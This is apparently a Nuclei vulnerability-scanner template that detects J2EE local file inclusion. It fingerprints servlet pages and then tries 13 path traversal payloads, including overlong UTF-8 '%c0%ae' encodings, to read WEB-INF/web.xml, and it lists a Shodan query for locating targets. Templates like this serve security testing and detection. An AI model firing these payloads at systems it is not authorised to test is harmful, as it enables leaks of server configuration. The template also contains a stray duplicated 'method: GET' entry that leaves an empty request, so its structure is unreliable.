id: generic-j2ee-lfi

info:
  name: Generic J2EE LFI Scan Panel - Detect
  author: davidfegyver
  severity: high
  description: Generic J2EE Scan panel was detected. Looks for J2EE specific LFI vulnerabilities; tries to leak the web.xml file.
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
  metadata:
    verified: true
    max-request: 14
    shodan-query: http.title:"J2EE"
  tags: lfi,generic,j2ee

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        words:
          - "J2EE"
          - "Java"
          - "servlet"
        condition: or
        internal: true

  - method: GET
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/../../../../WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml"
        - "/../../WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml;x="
        - "/../../WEB-INF/web.xml;x="
        - "/../WEB-INF/web.xml;x="
        - "/WEB-INF/web.xml"
        - "/.//WEB-INF/web.xml"
        - "/../WEB-INF/web.xml"
        - "/%c0%ae/WEB-INF/web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<servlet-name>"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202ff993cd6cf0a21281344ebd95cff196730e8edd0ff78525ab913eb1562efd0602202496f4afd4cdb3727cd4577ef41191cb7bfc1dfbe50946f02cf9c7d97bfb4133:922c64590222798bb761d5b6d8e72950